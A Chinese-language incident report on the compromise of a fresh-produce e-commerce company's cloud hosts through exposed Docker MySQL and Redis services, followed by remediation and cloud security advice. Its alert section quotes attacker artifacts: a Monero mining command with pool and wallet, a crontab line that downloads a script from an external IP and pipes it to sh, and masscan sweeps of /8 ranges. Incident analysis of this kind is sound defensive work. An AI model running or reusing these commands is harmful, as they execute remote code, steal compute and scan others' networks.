记一次某生鲜电商企业安全运营实战

[[383510]]

0x00、前言

继快递、外卖之后，互联网买菜也成为一种时尚。这背后是成长迅速的新零售生鲜行业，加之承载着非常高频、重要的本地生活平台入口功能，由此吸引着众多互联网巨头。那么针对本次风口，大公司有自己完善的安全治理解决方案，一般不会有重大的安全事件发生。但是针对一些中小公司来说，上线业务快(使用公有云)、没有完善的前期业务安全规划，安全运营外包，设置核心业务和核心算法与大学合作外包。导致安全事件频发，本文以一次某生鲜电商业务安全事件为切入点，讨论一下快餐时代的安全运营之道。

0x01、药引子

@1、泛互联网业务介绍

用户业务系统规模大约40+台服务器，包含：核心业务系统：云鲜集智能电商生态系统，客户关系管理系统;渠道端—营销端—数据端全链数字化运营体系：各种App渠道数据、第三方聊天记录数据导入系统，算法平台，自助式BI数据报表，辅助系统：服务器运维监控、监理程序、安全服务等。

@2、安全问题发现阶段

安全问题发现是从公有云平台侧发现的。在公有云外网出口Pop点IDS监控数据中发现该账号下多台主机出现对外DDoS攻击，导致影响部署在同一物理机上其它云主机出现网络数据丢包的现象，很不幸的是，这个被影响的用户是游戏厂商，对网络延时要求特别高，在网络性能监控系统中发现，延时增大影响业务。

@3、安全问题排查阶段

网络层面发现的安全问题需要到主机层面有相关的验证;主机层，需要安装主机安全客户端，否则无法感知到主机层的安全威胁，经后台查询发现该租户大部分云主机是没有安装公有云提供的默认镜像，导致没有安装云原生主机安全客户端，联系客户运维，在所有服务器上安装主机安全客户端，同时购买企业版。

安装完成后，主机安全入侵检测系统立刻发现海量的安全告警，告警类型包括：

【1】挖矿检测：

/tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxfKSr5jWEY6y7hVn7pLCe61AEvgogFDUoCKHE6P5BMHZj2UpMpyhwobY2ZR89vT -k –tls 

【2】病毒木马：

/tmp/watchdog 

【3】敏感文件篡改：

发现crontab下设置

0 0 */3 * * /bin/sh –c wget –q -0 –  
http://195.xxx.xxx.118/spr.sh|sh >/dev/null 2>&1 

【4】资产指纹

同时登陆主机安全运营界面，通过资产指纹功能查看发现：

运行了大量对外扫描的进程

masscan 126.0.0.0/8 -p2377 --rate=50000 
masscan 95.0.0.0/8 -p4243 --rate=50000 
masscan 225.0.0.0/8 -p4243 --rate=50000 
masscan 215.0.0.0/8 -p2376 --rate=50000 

同时发现大量容器接口对外监听，业务系统搭建比较随意，很多系统都是通过docker方式搭建，直接把docker端口映射到外网。其中包括redis、mysql等敏感服务。

【5】容器运行时安全

通过容器运行时安全产品功能发现：

@4、业务止损

发现问题的主机正好是前面提到的核心业务系统主机，出现问题后平台，直接下线其网络权限，导致生鲜业务订单系统无法正常运行，已改成手工excel记账的方式运转。所以，先做一下业务止损。

整体入侵流程：

1、暴力破解容器自带mysql和redis，

2、成功获取到数据库权限后写入下载恶意程序执行脚本

3、执行下恶意程序脚本

4、容器中部署挖矿程序

5、启动masscan扫描程序对外横向攻击

6、入侵宿主机部署挖矿程序和扫描程序。

整体止损流程：

•  清除crontab中加载的恶意脚本
• 杀掉进程
•  删除可疑进程相关文件
• 把请求地址加入黑名单
•  提申请开放网络权限

0x02、快餐时代的安全运营

根据与安全托管运营商沟通，发现这种泛互联网企业其实是不愿意在安全方面投钱，运营代理提供的安全建议也基本上认为不重要，等安全事件发生影响到业务了才有所醒悟。

经过多年的安全经验积累，建议云上租户做好以下几点：

1、充分利用公有云IaaS产品原生安全属性

•  VPC，不同的业务单元需要隔离。
•  安全组，针对主机对外开放端口要严格限制。
•  NATGateway，内部主机要上网走NATGateway
•  云主机使用复杂密码

2、适当的购买核心的云原生安全产品

•  主机安全企业版

主机安全，是服务器贴身安全管家，通过资产管理、漏洞管理、基线检查、入侵检测、程序运行认证、文件完整性校验，安全运营、网页防篡改等功能，帮助企业更方便地管理主机安全风险，实时发现黑客入侵行为，以及满足等保合规要求。

费用：市面上价格一年1000元/台, 40台大约4万块。当然还有折扣。

•  云Web应用防火墙

云Web应用防火墙(云WAF)，云Web应用防火墙WAF对网站业务流量进行多维度检测和防护,结合深度机器学习智能识别恶意请求特征和防御未知威胁,全面避免网站被黑客恶意攻击和入侵。

费用：市面上价格一年4000元/10个域名, 4.8万块。当然还有折扣。

3、提高安全意识

如果是代理运营的话，给出的安全建议要足够重视。

如若转载，请注明原文地址。